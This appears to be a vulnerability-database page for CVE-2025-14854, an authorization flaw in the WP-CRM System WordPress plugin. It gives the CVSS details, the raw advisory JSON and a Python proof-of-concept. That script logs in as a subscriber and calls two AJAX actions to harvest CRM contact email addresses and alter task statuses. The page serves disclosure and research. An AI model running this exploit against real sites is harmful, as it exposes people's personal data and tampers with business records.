Security Vulnerability Report
中文
CVE-2025-14854 CVSS 5.4 MEDIUM

CVE-2025-14854

Published: 2026-01-14 06:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP-CRM System plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on the wpcrm_get_email_recipients and wpcrm_system_ajax_task_change_status AJAX functions in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with subscriber level access and above, to enumerate CRM contact email addresses (PII disclosure) and modify CRM task statuses. CVE-2025-62106 is likely a duplicate of this issue.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP-CRM System plugin for WordPress <= 3.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14854 PoC - WP-CRM System Privilege Bypass # Affected: WP-CRM System <= 3.4.5 import requests import sys from urllib.parse import urljoin def exploit_cve_2025_14854(target_url, username, password): """ Exploit for CVE-2025-14854 - WP-CRM System Privilege Bypass This PoC demonstrates how an authenticated user with subscriber-level access can enumerate email addresses and modify task statuses. """ session = requests.Session() # Step 1: Login to WordPress with subscriber account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Successfully logged in with subscriber account") # Step 2: Enumerate email addresses via vulnerable AJAX endpoint ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php') # PoC 1: Get email recipients (PII disclosure) email_payload = { 'action': 'wpcrm_get_email_recipients', 'nonce': 'exploit' # In real attack, obtain valid nonce } print("[*] Attempting to enumerate email addresses...") try: email_response = session.post(ajax_url, data=email_payload, timeout=10) if email_response.status_code == 200: print("[+] Email enumeration request sent") print(f"[>] Response preview: {email_response.text[:200]}...") except requests.RequestException as e: print(f"[-] Email enumeration failed: {e}") # PoC 2: Modify task status task_payload = { 'action': 'wpcrm_system_ajax_task_change_status', 'task_id': '1', 'new_status': 'completed', 'nonce': 'exploit' # In real attack, obtain valid nonce } print("[*] Attempting to modify task status...") try: task_response = session.post(ajax_url, data=task_payload, timeout=10) if task_response.status_code == 200: print("[+] Task modification request sent") print(f"[>] Response: {task_response.text[:200]}") except requests.RequestException as e: print(f"[-] Task modification failed: {e}") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com/ subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_14854(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14854", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP-CRM System plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on the wpcrm_get_email_recipients and wpcrm_system_ajax_task_change_status AJAX functions in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with subscriber level access and above, to enumerate CRM contact email addresses (PII disclosure) and modify CRM task statuses. \tCVE-2025-62106 is likely a duplicate of this issue."}, {"lang": "es", "value": "El plugin WP-CRM System para WordPress es vulnerable a acceso no autorizado debido a la falta de comprobaciones de capacidad en las funciones AJAX wpcrm_get_email_recipients y wpcrm_system_ajax_task_change_status en todas las versiones hasta la 3.4.5, inclusive. Esto permite a atacantes autenticados, con acceso de nivel de suscriptor y superior, enumerar direcciones de correo electrónico de contactos de CRM (divulgación de PII) y modificar estados de tareas de CRM."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-dashboard-task-list.php?marks=177-190#L177", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-functions.php?marks=942-975#L942", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.6/includes/wcs-functions.php?marks=942-975#L942", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/da607df4-1dbb-4b1e-ace6-b339cf9e8512?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.